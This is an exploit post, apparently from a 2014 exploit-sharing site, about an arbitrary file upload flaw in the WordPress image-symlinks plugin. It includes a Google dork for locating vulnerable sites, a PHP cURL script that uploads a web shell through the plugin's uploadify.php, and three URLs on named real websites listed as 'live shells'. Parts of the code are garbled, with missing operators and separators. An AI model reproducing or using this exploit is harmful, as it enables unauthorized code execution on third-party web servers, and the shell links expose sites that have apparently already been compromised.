facebook facebook twitter rss

WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability

Author: X-Bruno , Published: 24-06-2014
############################################################################

# Title : WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability

# Author : X-Bruno

# Date : 24/06/2014

# Facebook : http://fb.me/Inj3ct.Bruno

# Email: brunox338@gmail.com

# Vendor : www.wordpress.org

# Google Dork : inurl:"/wp-content/plugins/image-symlinks/"

# Tested on : Windows 7 , Linux

######################################################################


==> Exploit Info :


The attacker can uplaod file/shell.php

("php") // Allowed file extensions



"/uploadify/"; // The path were we will save the file (getcwd() may n
ot be reliable and should be tested in your environment)


== > Exploit :


<?php



$uploadfile
="Bruno.php";

$ch curl_init("http://localhost/wordpress/wp-content/plugins/image-symlinks/uploadify/uploadify.php");

curl_setopt($chCURLOPT_POSTtrue);

curl_setopt($chCURLOPT_POSTFIELDS,

array(
'Filedata'=>"@$uploadfile",

'folder'=>'/wp-content/plugins/image-symlinks/uploadify/'));

curl_setopt($chCURLOPT_RETURNTRANSFER1);

$postResult curl_exec($ch);

curl_close($ch);



print 
"$postResult";

?>



Shell Access :http://localhost/wp-content/image-symlinks/uploadify/
random_name.php


<?php
phpinfo
();
?>



====================================

Examples : ( Live Shells )

1 - http://www.scuboutique.com/wp-content/uploads/image-symlinks/uploadify/hun.php

2- http://datadriven.info/wp-content/uploads/image-symlinks/uploadify/hun.php


3- http://www.inlan.fr//wp-content/uploads/image-symlinks/uploadify/
hun.php

# Greeting to : Syria , Palestine , HunTerS - Team

Like us on Facebook :